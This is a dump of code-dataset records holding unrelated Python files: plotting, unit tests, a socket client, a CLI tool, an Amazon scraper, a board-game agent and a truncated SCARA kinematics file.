broadcast_id)\r\n","repo_name":"agentdisguise/automate_livestream","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"13414846999","text":"#!/usr/bin/env python\n# coding: utf-8\n# Author : Swetabh\n\n# In[1]: Imports\n\nimport pandas as pd\nfrom pandas.plotting import register_matplotlib_converters\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport matplotlib.dates as mdates\nimport datetime as dt\nfrom dateutil.relativedelta import relativedelta\n\nregister_matplotlib_converters()\n\n# In[2]: CSV Operations\n\n_csv = pd.read_csv('result.csv', index_col=False)\ndate = _csv['Date'].tolist()\ntotal_images = _csv['Proxies Identified'].tolist()\nprecision = _csv['Precision'].tolist()\nrecall = _csv['Recall'].tolist()\n\n\n# In[3]: Plot\n\n\ndef _plot(time_range=\"Last Week\", _end=None):\n fig, ax1 = plt.subplots()\n ax2 = ax1.twinx()\n _date = [datetime.strptime(d, '%d/%m/%Y') for d in date]\n ax1.plot_date(_date, total_images, 'r-', label='Total Images')\n ax2.plot_date(_date, recall, 'g-', label='Recall')\n ax2.plot_date(_date, precision, 'b-', label='Precision')\n ax1.set_ylim([25, 80])\n ax2.set_ylim([0.3, 1.0])\n ax1.set_ylabel('Total Images Processed', color='black')\n ax2.set_ylabel('Precision | Recall', color='black')\n if _end is not None:\n fig.suptitle('Plot for Date Range: '+time_range+' to '+_end)\n else:\n fig.suptitle('Plot for '+time_range)\n fig.legend(loc='upper right')\n x_dates = mdates.DateFormatter('%d/%m/%Y')\n ax1.xaxis.set_major_formatter(x_dates)\n plt.gcf().autofmt_xdate()\n if _end is not None:\n start_date = dt.datetime.strptime(time_range, '%d/%m/%Y')\n end_date = dt.datetime.strptime(_end, '%d/%m/%Y')\n ax1.set_xlim(start_date, end_date)\n plt.show()\n\n else:\n start_date, end_date = _custom_date(time_range)\n ax1.set_xlim(start_date, end_date)\n plt.show()\n\n\ndef _custom_date(time_range):\n today = dt.date.today()\n start = ''\n end = ''\n # if time_range == 'last week' or time_range == 'Last Week':\n # start_date = today - relativedelta(days=7)\n # end_date = today - relativedelta(days=1)\n # return start_date, end_date\n if time_range == 'last month' or time_range == 'Last Month':\n start = today - relativedelta(months=1)\n start_date = dt.date(start.year, start.month, 1)\n end_date = dt.date(today.year, today.month, 1) - relativedelta(days=1)\n return start_date, end_date\n elif time_range == 'this month' or time_range == 'This Month':\n start_date = today - relativedelta(days=(today.day - 1))\n end_date = today - relativedelta(days=1)\n return start_date, end_date\n else:\n start_date = today - relativedelta(days=7)\n end_date = today - relativedelta(days=1)\n return start_date, end_date\n\n\n# In[5]: Main Function\n\n# Default plot : Last Week\nif __name__ == '__main__':\n _plot()\n","repo_name":"swetabhmukherjee/smarteye-metrics","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"73044398403","text":"import unittest\nimport mock\nfrom agent import collector\nfrom agent import vm\nimport libvirt\n\n\nclass TestVMStatsCollector(unittest.TestCase):\n\n @mock.patch.object(libvirt.virConnect, 'lookupByUUIDString')\n def test_recordStats(self, mock_lookup):\n vm_factory = vm.VMFactory()\n vm_info = {\n 'uuid': \"6717da86-fc51-474d-92fe-a76380c27c62\",\n 'name': \"instance-000003f9\"\n }\n vm_factory.addVM(0, vm_info)\n vm_storage = mock.MagicMock()\n mock_save = vm_storage.saveStatsInfo\n vm_collector = collector.VMStatsCollector(vm_factory, vm_storage)\n vm_collector.recordStats()\n self.assertTrue(mock_lookup.called)\n self.assertTrue(mock_save.called)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"openeuler-mirror/VMAnalyzer","sub_path":"tests/unit/agent/test_collector.py","file_name":"test_collector.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"11942260295","text":"# model of client for testing purpouses\nimport struct \nimport eventlet\nimport json\nimport sys\nimport uuid\n\nfrom eventlet.green import socket\n\nimport scp.protocols as prot\nimport scp.protobufs.sfk_pb2 as SfkPb\nfrom scp.logger import LOGGER\nfrom scp.common import str_uuid\n\nfrom sfkmodel import serialize_int, SfkModel\n\nADDRESS = ('127.0.0.1', 6008)\nappids = ['abcdef00', 'abcdef11']\n\nID = 'A'\nAPPID_NO = 0\n\n\nclass ClientModel(SfkModel):\n \n NATIVE_PACKET = prot.Spif2Packet\n \n def __init__(self, appid=''):\n super(ClientModel, self).__init__()\n self.appid = appid\n self.sock = socket.socket()\n\n\n def _make_session_packet(self):\n packet = prot.Spif2Packet()\n magic = prot.Spif2Packet.MAGIC\n\n # make protobuf field\n pb = SfkPb.Msg()\n pb.mtype = pb.SESSION\n pb.session.fid = 273 # just a placeholder, hmm.. \n # let it be an absolute temperature zero\n params = json.dumps({'sfk-url':'tcp://127.0.0.1:6009/' + self.appid})\n pb.session.params = params\n protobuf = pb.SerializeToString()\n\n data = ''\n\n buf = (serialize_int(magic) + \n serialize_int(len(protobuf)) +\n serialize_int(len(data)) + \n protobuf + \n data)\n\n packet.set_raw_packet(buf)\n return packet\n\n def _make_message_packet(self, n):\n pb = SfkPb.Msg()\n pb.mtype = pb.DATA\n pb.data.content_type = \"simple\"\n pb.data.payload = \"test\"\n protobuf = pb.SerializeToString()\n\n data = ID + (\"0000\" + str(n))[-4:]\n return prot.Spif2Packet(protobuf=protobuf, data=data)\n\n\n def connect(self, addr):\n super(ClientModel, self).connect(addr) \n \n\n def send_packet(self, packet):\n super(ClientModel, self).send_packet(packet)\n\n\n def recved_packets_processor(self):\n try:\n while True:\n packet = self.queue_recv.get()\n LOGGER.info(\"recved: %s\" % packet.bindata)\n except Exception as e:\n LOGGER.error(\"recved_packets_processor: %s\" % str(e))\n\n\n def test(self, interval, n):\n for i in range(n):\n eventlet.sleep(interval)\n packet = self._make_message_packet(i)\n self.queue_send.put(packet)\n\n\nif __name__ == '__main__':\n\n try:\n ID = sys.argv[1]\n except Exception:\n LOGGER.info(\"Default value for ID(%s) will be used\" % ID)\n\n try:\n APPID_NO = int(sys.argv[2])\n except Exception:\n LOGGER.info(\"Default value for APPID_NO(%d) will be used\" % APPID_NO)\n\n client = ClientModel(appid=appids[APPID_NO])\n client.connect(ADDRESS)\n client.send_packet(client._make_session_packet())\n eventlet.spawn_n(client.recver)\n eventlet.spawn_n(client.sender)\n eventlet.spawn_n(client.recved_packets_processor)\n\n client.test(2, 5)\n \n eventlet.event.Event().wait()\n","repo_name":"qwdm/scp","sub_path":"tests/clientmodel.py","file_name":"clientmodel.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"5120952991","text":"#!/usr/bin/env python\n# coding: utf-8\n\"\"\"\nFusionner des sous-modèles dans un même sous-modèle\nPour l'instant, seules les lois de frottement sont suffixées\n\"\"\"\nimport sys\n\nfrom crue10.etude import Etude\nfrom crue10.sous_modele import SousModele\nfrom crue10.utils import ExceptionCrue10, logger\nfrom crue10.utils.cli_parser import MyArgParse\n\n\ndef crue10_merge_sous_modeles(args):\n if len(args.etu_path_list) != len(args.sm_name_list) != len(args.suffix_list):\n raise ExceptionCrue10(\"Les arguments `etu_path_list`, `suffix_list` \"\n \"et `sm_name_list` n'ont pas la même longueur !\")\n if len(args.etu_path_list) < 2:\n raise ExceptionCrue10(\"Il faut au moins 2 sous-modèles pour faire la fusion !\")\n\n merged_sous_modele = None\n for etu_path, sm_name, suffix in zip(args.etu_path_list, args.sm_name_list, args.suffix_list):\n etude = Etude(etu_path)\n sous_modele = etude.get_sous_modele(sm_name)\n sous_modele.read_all()\n logger.info(sous_modele)\n\n if merged_sous_modele is None:\n merged_sous_modele = SousModele(sous_modele.id, files=sous_modele.files,\n version_grammaire=sous_modele.version_grammaire)\n merged_sous_modele.ajouter_emh_depuis_sous_modele(sous_modele, suffix)\n\n logger.info(\"~> Sous-modèle fusionné:\")\n logger.info(merged_sous_modele)\n merged_sous_modele.write_all(args.output_folder, folder_config='Config')\n\n\nparser = MyArgParse(description=__doc__)\nparser_submodels = parser.add_argument_group(\"Choix des sous-modèles à fusionner\")\nparser_submodels.add_argument('--etu_path_list', help=\"liste des chemins vers des fichiers etu.xml\", nargs='+',\n required=True)\nparser_submodels.add_argument('--sm_name_list', help=\"liste des noms des sous-modèles\", nargs='+', required=True)\nparser_submodels.add_argument('--suffix_list', help=\"liste des suffixes\", nargs='+', required=True)\nparser.add_argument('output_folder', help=\"nom du dossier de sortie\")\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n try:\n crue10_merge_sous_modeles(args)\n except ExceptionCrue10 as e:\n logger.critical(e)\n sys.exit(1)\n","repo_name":"CNR-Engineering/Crue10_tools","sub_path":"cli/crue10_merge_submodels.py","file_name":"crue10_merge_submodels.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"fr","doc_type":"code","stars":4,"dataset":"github-code","pt":"98"} +{"seq_id":"32100194935","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 23 17:39:27 2019\n\n@author: mccambria\n\"\"\"\n\nfrom pulsestreamer import Sequence\nfrom pulsestreamer import OutputState\nimport numpy\n\nLOW = 0\nHIGH = 1\n\n\ndef get_seq(pulser_wiring, args):\n\n # %% Parse wiring and args\n\n # The first 9 args are ns durations and we need them as int64s\n durations = args[0:4]\n durations = [numpy.int64(el) for el in durations]\n\n # Unpack the durations\n polarization_dur, reference_wait_dur, gate_dur, aom_delay = durations\n \n # Buffer turning off the AOM so that we're sure the AOM was fully on for\n # the duration of the gate. This also separates the gate falling edge from\n # the clock rising edge - if these are simultaneous the tagger can get\n # confused\n aom_switch_buffer_dur = 100\n\n # Get the APD indices\n apd_index = args[4]\n\n # Get what we need out of the wiring dictionary\n key = 'do_apd_{}_gate'.format(apd_index)\n pulser_do_apd_gate = pulser_wiring[key]\n pulser_do_aom = pulser_wiring['do_532_aom']\n\n # %% Couple calculated values\n\n # The period is independent of the particular tau, but it must be long\n # enough to accomodate the longest tau\n period = aom_delay + polarization_dur + reference_wait_dur + gate_dur\n\n # %% Define the sequence\n\n seq = Sequence()\n\n # APD gating\n train = [(aom_delay + polarization_dur + reference_wait_dur, LOW),\n (gate_dur, HIGH),\n (aom_switch_buffer_dur, LOW)]\n seq.setDigital(pulser_do_apd_gate, train)\n\n # AOM\n# train = [(polarization_dur, HIGH),\n# (reference_wait_dur, LOW),\n# (gate_dur + aom_switch_buffer_dur, HIGH),\n# (aom_delay, LOW)]\n train = [(period, HIGH)] # Always on to completely negate transient brightness\n seq.setDigital(pulser_do_aom, train)\n\n final_digital = [pulser_wiring['do_532_aom'],\n pulser_wiring['do_sample_clock']]\n final = OutputState(final_digital, 0.0, 0.0)\n return seq, final, [period]\n\n\nif __name__ == '__main__':\n wiring = {'do_532_aom': 0, 'do_apd_0_gate': 1}\n args = [3 * 10**3, 2 * 10**3, 320, 0, 0]\n seq = get_seq(wiring, args)[0]\n seq.plot()\n","repo_name":"mccambria/dioptric","sub_path":"servers/timing/sequencelibrary/pulse_gen_SWAB_82/count_rate_versus_readout_dur.py","file_name":"count_rate_versus_readout_dur.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"98"} +{"seq_id":"41139412534","text":"from bs4 import BeautifulSoup\nimport requests\nimport random as rand\n\n# Function to extract Product Title\ndef get_title(soup):\n\t\n\ttry:\n\t\t# Outer Tag Object\n\t\ttitle = soup.find(\"span\", attrs={\"id\":'productTitle'})\n\n\t\t# Inner NavigatableString Object\n\t\ttitle_value = title.string \n\n\t\t# Title as a string value\n\t\ttitle_string = title_value.strip()\n\n\t\t# # Printing types of values for efficient understanding\n\t\t# print(type(title))\n\t\t# print(type(title_value))\n\t\t# print(type(title_string))\n\t\t# print()\n\n\texcept AttributeError:\n\t\ttitle_string = \"\"\t\n\n\treturn title_string\n\n# Function to extract Product Price\ndef get_price(soup):\n\n\ttry:\n\t\tprice = soup.find(\"span\", attrs={'id':'priceblock_ourprice'}).string.strip()\n\n\texcept AttributeError:\n\n\t\ttry:\n\t\t\t# If there is some deal price\n\t\t\tprice = soup.find(\"span\", attrs={'id':'priceblock_dealprice'}).string.strip()\n\n\t\texcept:\t\t\n\t\t\tprice = \"\"\t\n\n\treturn price\n\n# Function to extract Product Rating\ndef get_rating(soup):\n\n\ttry:\n\t\trating = soup.find(\"i\", attrs={'class':'a-icon a-icon-star a-star-4-5'}).string.strip()\n\t\t\n\texcept AttributeError:\n\t\t\n\t\ttry:\n\t\t\trating = soup.find(\"span\", attrs={'class':'a-icon-alt'}).string.strip()\n\t\texcept:\n\t\t\trating = \"\"\t\n\n\treturn rating\n\n# Function to extract Number of User Reviews\ndef get_review_count(soup):\n\ttry:\n\t\treview_count = soup.find(\"span\", attrs={'id':'acrCustomerReviewText'}).string.strip()\n\t\t\n\texcept AttributeError:\n\t\treview_count = \"\"\t\n\n\treturn review_count\n\n# Function to extract Availability Status\ndef get_availability(soup):\n\ttry:\n\t\tavailable = soup.find(\"div\", attrs={'id':'availability'})\n\t\tavailable = available.find(\"span\").string.strip()\n\n\texcept AttributeError:\n\t\tavailable = \"Not Available\"\t\n\n\treturn available\t\n\n\nif __name__ == '__main__':\n\n\t# Headers for request\n rotated_headers = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15']\n HEADERS = ({'User-Agent':\n rotated_headers[rand.randrange(0, len(rotated_headers))],\n\t 'Accept-Language': 'en-US'})\n\n\t# The webpage URL\n URL = \"https://www.amazon.com/Cancelling-Headphones-Lightweight-Srhythm-Bluetooth/dp/B083S6Q8VK/ref=sr_1_2_sspa?c=ts&keywords=Over-Ear+Headphones&qid=1688949354&s=aht&sr=1-2-spons&ts_id=12097479011&sp_csd=d2lkZ2V0TmFtZT1zcF9hdGY&psc=1\"\n\t\n\t# HTTP Request\n webpage = requests.get(URL, headers=HEADERS)\n print(webpage)\n\n\t# Soup Object containing all data\n soup = BeautifulSoup(webpage.content, \"lxml\")\n print(soup)\n \n \"\"\"\n\t# Fetch links as List of Tag Objects\n links = soup.find_all(\"a\", attrs={'class':'a-link-normal s-no-outline'})\n\n\t# Store the links\n links_list = []\n\n\t# Loop for extracting links from Tag Objects\n for link in links:\n links_list.append(link.get('href'))\n\n\t# Loop for extracting product details from each link \n for link in links_list:\n\n new_webpage = requests.get(\"https://www.amazon.com\" + link, headers=HEADERS)\n\n new_soup = BeautifulSoup(new_webpage.content, \"lxml\")\n\t\t\n\t\t# Function calls to display all necessary product information\n print(\"Product Title =\", get_title(new_soup))\n print(\"Product Price =\", get_price(new_soup))\n print(\"Product Rating =\", get_rating(new_soup))\n print(\"Number of Product Reviews =\", get_review_count(new_soup))\n print(\"Availability =\", get_availability(new_soup))\n print()\n print()\n\t \"\"\"","repo_name":"chase-geyer/roommate-app","sub_path":"scraping_data.py","file_name":"scraping_data.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9455807055","text":"import sys\n\ndef filter_replace(x):\n f=open('/users/yufangxian/Documents/exercise/filter.txt','r')\n words=f.read()\n wordlist=words.split()\n #print(words)\n for word in wordlist:\n if word in x:\n x=x.replace(word,'**')\n print(x)\n\n\n\n\n\nif __name__=='__main__':\n while True:\n x=input('please input:')\n filter_replace(x)\n","repo_name":"fangxian/python","sub_path":"exercises/exercise12.py","file_name":"exercise12.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39075190061","text":"# Student agent: Add your own agent here\nimport math\nfrom copy import deepcopy\n\nimport numpy as np\n\nfrom agents.agent import Agent\nfrom store import register_agent\nimport sys\n\n\n@register_agent(\"student_agent\")\nclass StudentAgent(Agent):\n \"\"\"\n A dummy class for your implementation. Feel free to use this class to\n add any helper functionalities needed for your agent.\n \"\"\"\n\n def __init__(self):\n super(StudentAgent, self).__init__()\n self.name = \"StudentAgent\"\n self.dir_map = {\n \"u\": 0,\n \"r\": 1,\n \"d\": 2,\n \"l\": 3,\n }\n self.moves = ((-1, 0), (0, 1), (1, 0), (0, -1))\n self.opposites = {0: 2, 1: 3, 2: 0, 3: 1}\n\n self.autoplay = True\n\n def check_valid_step(self, start_pos1, end_pos1, adv_pos1, chess_board, max_step):\n \"\"\"\n Check if the step the agent takes is valid (reachable and within max steps).\n\n Parameters\n ----------\n start_pos : tuple\n The start position of the agent.\n end_pos : np.ndarray\n The end position of the agent.\n barrier_dir : int\n The direction of the barrier.\n \"\"\"\n # checks if shortest distance is reachable\n # does not check whether the path is reachable when factoring in borders\n x_diff = abs(start_pos1[0] - end_pos1[0])\n y_diff = abs(start_pos1[1] - end_pos1[1])\n if (x_diff + y_diff > max_step):\n return False\n start_pos = np.asarray(start_pos1)\n end_pos = np.asarray(end_pos1)\n adv_pos = np.asarray(adv_pos1)\n if np.array_equal(start_pos, end_pos):\n return True\n\n #check if path is actually reachable\n state_queue = [(start_pos, 0)]\n visited = {tuple(start_pos)}\n is_reached = False\n while state_queue and not is_reached:\n cur_pos, cur_step = state_queue.pop(0)\n r, c = cur_pos\n if cur_step == max_step:\n break\n for dir, move in enumerate(self.moves):\n if chess_board[r, c, dir]:\n continue\n\n next_pos = cur_pos + move\n if np.array_equal(next_pos, adv_pos) or tuple(next_pos) in visited:\n continue\n if np.array_equal(next_pos, end_pos):\n is_reached = True\n break\n visited.add(tuple(next_pos))\n state_queue.append((next_pos, cur_step + 1))\n return is_reached\n\n def dist(self, c1, c2):\n x_dist = c1[0] - c2[0]\n y_dist = c1[1] - c2[1]\n return (x_dist, y_dist)\n\n def barrier_chooser(self, chess_board, end_pos, guess):\n if (not chess_board[end_pos[0], end_pos[1], guess]):\n return guess\n for i in range(4):\n if (not chess_board[end_pos[0], end_pos[1], i]):\n dir = i\n return dir\n\n\n def bsf2(self, chess_board, start_pos1, adv_pos1, list, final):\n start_pos = np.asarray(start_pos1)\n adv_pos = np.asarray(adv_pos1)\n # BFS\n if tuple(start_pos) in list:\n return tuple(start_pos), 0\n state_queue = [(start_pos, 0)]\n visited = {tuple(start_pos)}\n is_reached = False\n\n while state_queue and not is_reached:\n cur_pos, cur_step = state_queue.pop(0)\n r, c = cur_pos\n for dir, move in enumerate(self.moves):\n if chess_board[r, c, dir]:\n continue\n next_pos = cur_pos + move\n if np.array_equal(next_pos, adv_pos) or tuple(next_pos) in visited:\n continue\n if tuple(next_pos) in list and tuple(next_pos) not in final:\n is_reached = True\n break\n visited.add(tuple(next_pos))\n state_queue.append((next_pos, cur_step + 1))\n\n if tuple(next_pos) not in list:\n return False\n\n return tuple(next_pos), cur_step + 1\n\n def find_best_moves(self, chess_board, adv_pos):\n best_moves = []\n # finds the best tiles to move to\n if (not chess_board[adv_pos[0], adv_pos[1], 0]):\n best_moves.append((adv_pos[0] - 1, adv_pos[1]))\n if (not chess_board[adv_pos[0], adv_pos[1], 1]):\n best_moves.append((adv_pos[0], adv_pos[1] + 1))\n if (not chess_board[adv_pos[0], adv_pos[1], 2]):\n best_moves.append((adv_pos[0] + 1, adv_pos[1]))\n if (not chess_board[adv_pos[0], adv_pos[1], 3]):\n best_moves.append((adv_pos[0], adv_pos[1] - 1))\n return best_moves\n\n def get_valid_moves(self, chess_board, my_pos, adv_pos, max_step):\n poss_moves = []\n size = len(chess_board)\n # gets all tiles on the board that are reachable and adds to poss_moves\n for i in range(size):\n for j in range(size):\n coord = (i, j)\n if (self.check_valid_step(my_pos, coord, adv_pos, chess_board, max_step) and coord != adv_pos):\n poss_moves.append(coord)\n return poss_moves\n\n\n def pick_moves(self, chess_board, adv_pos, poss_moves, best_moves):\n #BFS\n min = 100\n final = []\n for move in best_moves:\n bfs = self.bsf2(chess_board, move, adv_pos, poss_moves, final)\n if bfs == False:\n continue\n else:\n if bfs[0] not in final:\n final.append(bfs[0])\n if (bfs[1] <= min):\n min = bfs[1]\n min_m = bfs[0]\n #if BFS fails -> Backup\n if final == []:\n for move in poss_moves:\n for move2 in best_moves:\n x_d = move[0] - move2[0]\n y_d = move[1] - move2[1]\n if (abs(x_d) + abs(y_d) <= min):\n min = abs(x_d) + abs(y_d)\n min_m = move\n final.append(move)\n return final, min_m\n\n def choose_dir(self, adv_pos, chess_board, final):\n dis = self.dist(final, adv_pos)\n if (abs(dis[0]) <= abs(dis[1])):\n if (dis[1] < 0 and not chess_board[final[0], final[1], 1]):\n dir = 1\n elif (dis[1] >= 0 and not chess_board[final[0], final[1], 3]):\n dir = 3\n else:\n if (dis[0] < 0):\n dir = self.barrier_chooser(chess_board, final, 2)\n else:\n dir = self.barrier_chooser(chess_board, final, 0)\n\n else:\n if (dis[0] < 0 and not chess_board[final[0], final[1], 2]):\n dir = 2\n elif (dis[0] >= 0 and not chess_board[final[0], final[1], 0]):\n dir = 0\n else:\n if (dis[1] < 0):\n dir = self.barrier_chooser(chess_board, final, 1)\n else:\n dir = self.barrier_chooser(chess_board, final, 3)\n return dir\n\n def set_barrier(self, r, c, dir, chess_board):\n # Set the barrier to True\n chess_board[r, c, dir] = True\n # Set the opposite barrier to True\n move = self.moves[dir]\n chess_board[r + move[0], c + move[1], self.opposites[dir]] = True\n\n def check_endgame(self, chess_board, player_pos, opponent_pos):\n board_size = int(math.sqrt(chess_board.size) / 2)\n\n # Union-Find\n father = dict()\n for r in range(board_size):\n for c in range(board_size):\n father[(r, c)] = (r, c)\n\n def find(pos):\n if father[pos] != pos:\n father[pos] = find(father[pos])\n return father[pos]\n\n def union(pos1, pos2):\n father[pos1] = pos2\n\n for r in range(board_size):\n for c in range(board_size):\n for dir, move in enumerate(\n self.moves[1:3]\n ): # Only check down and right\n if chess_board[r, c, dir + 1]:\n continue\n pos_a = find((r, c))\n pos_b = find((r + move[0], c + move[1]))\n if pos_a != pos_b:\n union(pos_a, pos_b)\n\n for r in range(board_size):\n for c in range(board_size):\n find((r, c))\n p0_r = find(player_pos)\n p1_r = find(opponent_pos)\n p0_score = list(father.values()).count(p0_r)\n p1_score = list(father.values()).count(p1_r)\n\n #print(\"Point Counting\")\n if p0_r == p1_r:\n return 0\n if p0_score > p1_score:\n return 1\n elif p0_score < p1_score:\n return -1\n else:\n return 0.5\n\n\n\n def minimax(self, chess_board, my_pos, adv_pos, poss_moves, max_step, depth=0):\n dict = {}\n lose = 0\n tie = 0\n for move in poss_moves:\n copy = deepcopy(chess_board)\n opp_utility = []\n self.set_barrier(move[0][0], move[0][1], move[1], copy)\n # we calculate the utility of our move by checking endgame and seeing if we won, lost or game still going\n utility = self.check_endgame(copy, move[0], adv_pos)\n # if utility is 1 then we win so we can break out and perform this move\n if utility == 1 and depth == 0:\n return move\n # if utility is -1 we lose so we eliminate this move as an option and continue\n if utility == -1 and depth == 0:\n lose = move\n if utility == 0.5 and depth == 0:\n tie = move\n # if utility is 0 the result is undetermined so we keep this move as an option and continue\n if utility == 0 and depth == 0:\n # we run the opponents move in response to each of our potential moves\n best_moves = self.find_best_moves(copy, move[0])\n poss_moves = self.get_valid_moves(copy, adv_pos, move[0], max_step)\n moves = self.pick_moves(copy, move[0], poss_moves, best_moves)\n final = self.generate_full_moves(copy, moves[0])\n # we calculate the opponents utility for all their possible moves and return min utility\n opp_utility = min(self.minimax(copy, adv_pos, move[0], final, max_step, 1))\n dict[move] = opp_utility*-1\n if depth == 1:\n opp_utility.append(utility)\n if depth == 1:\n return opp_utility\n if bool(dict):\n max_move = max(dict, key=dict.get)\n else:\n if tie != 0:\n return tie\n else:\n return lose\n if dict[max_move] == 0:\n m = [k for k, v in dict.items() if v == 0]\n return m\n return max_move\n\n\n # return the best move\n def generate_full_moves(self, chess_board, moves):\n final = []\n for move in moves:\n for i in range(4):\n r, c = move\n if not chess_board[r, c, i]:\n final.append((move, i))\n return final\n\n def step(self, chess_board, my_pos, adv_pos, max_step):\n \"\"\"\n Implement the step function of your agent here.\n You can use the following variables to access the chess board:\n - chess_board: a numpy array of shape (x_max, y_max, 4)\n - my_pos: a tuple of (x, y)\n - adv_pos: a tuple of (x, y)\n - max_step: an integer\n\n You should return a tuple of ((x, y), dir),\n where (x, y) is the next position of your agent and dir is the direction of the wall\n you want to put on.\n\n Please check the sample implementation in agents/random_agent.py or agents/human_agent.py for more details.\n \"\"\"\n\n # finds the tiles right next to the opponent that do not have a barrier\n best_moves = self.find_best_moves(chess_board, adv_pos)\n # gets all tiles on the board that are reachable and adds to poss_moves\n poss_moves = self.get_valid_moves(chess_board,my_pos, adv_pos, max_step)\n # finds move from poss_moves that is closest to the 'best tile'\n moves = self.pick_moves(chess_board,adv_pos,poss_moves,best_moves)\n\n final = self.generate_full_moves(chess_board, moves[0])\n\n result = self.minimax(chess_board,my_pos,adv_pos,final, max_step)\n dir = -1\n if type(result) == list:\n for move in result:\n if (moves[1] == move[0]):\n dir = self.choose_dir(adv_pos, chess_board, move[0])\n if dir != -1:\n return move[0], dir\n if dir == -1:\n return result[0][0], result[0][1]\n\n return result[0], result[1]\n","repo_name":"comp424mcgill/final-project-vishvak-mark","sub_path":"agents/student_agent.py","file_name":"student_agent.py","file_ext":"py","file_size_in_byte":12849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"16807630990","text":"import random\nfrom math import comb\nimport numpy as np\n\n\ndef p_k(p, n, k):\n return comb(3,k) * pow(p, k) * pow((1-p), (n-k))\n\nif __name__ == '__main__':\n k_max_for_coin_one = 2\n\n choices_of_coins = ['one', 'two']\n weight_p = [3, 1]\n # weight_p = [0.75, 0.25]\n\n choices = ['H', 'T']\n # coin_weights = {\n # 'one': [0.25, 0.75],\n # 'two': [0.75, 0.25]\n # }\n coin_weights = {\n 'one': [1, 3],\n 'two': [3, 1]\n }\n\n total_guesses = 1\n correct_guesses = 0.0\n for i in range(0, total_guesses):\n \n picked_coin = random.choices(choices_of_coins, weights=weight_p, k=1)[0]\n # picked_coin = np.random.choice(choices_of_coins, p=weight_p)\n\n # print(picked_coin)\n\n flip_results = random.choices(choices, weights=coin_weights[picked_coin], k=3)\n # flip_results = np.random.choice(choices, size=3, p=coin_weights[picked_coin])\n\n\n # print(flip_results)\n\n number_of_heads = len([f for f in flip_results if f == 'H'])\n\n # print(number_of_heads)\n\n guess = 'one' if number_of_heads <= k_max_for_coin_one else 'two'\n\n # print(guess)\n guess_correct = guess == picked_coin\n if guess_correct:\n correct_guesses = correct_guesses + 1\n\n # print(correct_guesses)\n \n print(\"correct/total\", correct_guesses/total_guesses)\n\n print(\"#####\")\n \n p = 0.25\n n = 3\n coin_one = p_k(p, n, 0) + p_k(p, n, 1) + p_k(p, n, 2)\n coin_two = p_k(1-p, n, 3)\n\n print(0.75*coin_one + 0.25*coin_two)\n ","repo_name":"melaoni/expense-tracking","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5885402473","text":"from rest_framework.status import HTTP_200_OK\nfrom rest_framework.utils import json\n\nfrom albums.serializers import PhotoSerializer, AlbumSerializer\n\n\ndef album_with_photos_template(album, photos, as_json=False):\n obj = {\n 'pk': album.pk,\n 'slug': album.slug,\n 'name': album.name,\n 'description': album.description,\n 'is_public': album.is_public,\n 'album_type': album.album_type,\n 'photos': list(PhotoSerializer(photos, many=True).data)\n }\n\n if as_json:\n return json.dumps(obj)\n return obj\n\n\ndef save_template(**kwargs):\n as_json = kwargs['as_json']\n status = kwargs['status']\n request = kwargs['request']\n result = kwargs['result']\n\n if status == HTTP_200_OK:\n message = 'Save successful'\n data = AlbumSerializer(result).data\n else:\n message = result\n data = request.data\n\n response = {\n 'status': status,\n 'message': message,\n 'data': data\n }\n\n if as_json:\n return json.dumps(response)\n return response\n","repo_name":"jorgec/project_linecare","sub_path":"albums/modules/response_templates/album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5274207440","text":"import math\n\n\"\"\"\nuse SI units\nlength: m (meters)\nangle: rad (pi = 180°)\n\"\"\"\n# define scara arm\nL1 = 130/1000 # in m\nL2 = 130/1000 # in m\nalpha_min = math.radians( -90)\nalpha_max = math.radians( 90)\ngamma_min = math.radians( 45)\ngamma_max = math.radians( 180)\nx_offset = 0\ny_offset = 0\n\n# math helpers\nL1_2 = math.pow(L1, 